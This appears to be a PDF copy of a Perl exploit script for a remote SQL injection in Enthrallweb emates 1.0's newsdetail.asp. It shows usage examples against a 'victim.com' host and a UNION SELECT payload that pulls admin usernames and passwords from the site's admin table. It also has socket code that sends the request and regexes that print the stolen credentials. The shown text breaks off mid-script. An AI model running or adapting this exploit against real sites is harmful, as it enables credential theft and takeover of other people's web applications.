Enthrallweb emates 1.0 newsdetail.asp Remote SQL Injection Exploit.pdf

1 #!/usr/bin/perl 2 #[Script Name: Enthrallweb emates 1.0 (newsdetail.asp) Remote SQL Injection Exploit 3 #[Coded by : ajann 4 #[Author : ajann 5 #[Contact : :( 6 #[S.Page : http://www.enthrallweb.us 7 #[$ : 119.40 USD 8 #[.. : ajann,Turkey 9 10 use IO::Socket; 11 if(@ARGV < 3){ 12 print " 13 [======================================================================== 14 [// Enthrallweb emates 1.0 (newsdetail.asp) Remote SQL Injection Exploit 15 [// Usage: exploit.pl [target] [path] 16 [// Example: exploit.pl victim.com / 17 [// Example: exploit.pl victim.com /path/ 18 [// Vuln&Exp : ajann 19 [======================================================================== 20 "; 21 exit(); 22 } 23 #Local variables 24 $server = $ARGV[0]; 25 $server =~ s/(http:\/\/)//eg; 26 $host = "http://".$server; 27 $port = "80"; 28 $dir = $ARGV[1]; 29 $file = "/newsdetail.asp?ID="; 30 $target = "−1%20union%20select%200,admin_username,admin_password,0,0%20from%20admin%20where%20id%20like%20".$ARGV[2]; 31 $target = $host.$dir.$file.$target; 32 33 #Writing data to socket 34 print "+**********************************************************************+\n"; 35 print "+ Trying to connect: $server\n"; 36 $socket = IO::Socket::INET−>new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; 37 print $socket "GET $target HTTP/1.1\n"; 38 print $socket "Host: $server\n"; 39 print $socket "Accept: */*\n"; 40 print $socket "Connection: close\n\n"; 41 print "+ Connected!...\n"; 42 #Getting 43 while($answer = <$socket>) { 44 if ($answer =~ /<\/b><font color=\"#FFFFFF\" size=\"1\" face=\"Verdana, Arial, Helvetica, sans−serif\">(.*?)<\/font>/ ){ 45 print "+ Exploit succeed! Getting admin information.\n"; 46 print "+ −−−−−−−−−−−−−−−− +\n"; 47 print "+ Username: $1\n"; 48 } 49 50 if ($answer =~ /<b><font color=\"#FFFFFF\" size=\"1\" face=\"Verdana, Arial, Helvetica, sans−serif\">(.*?)<\/font>/){ Page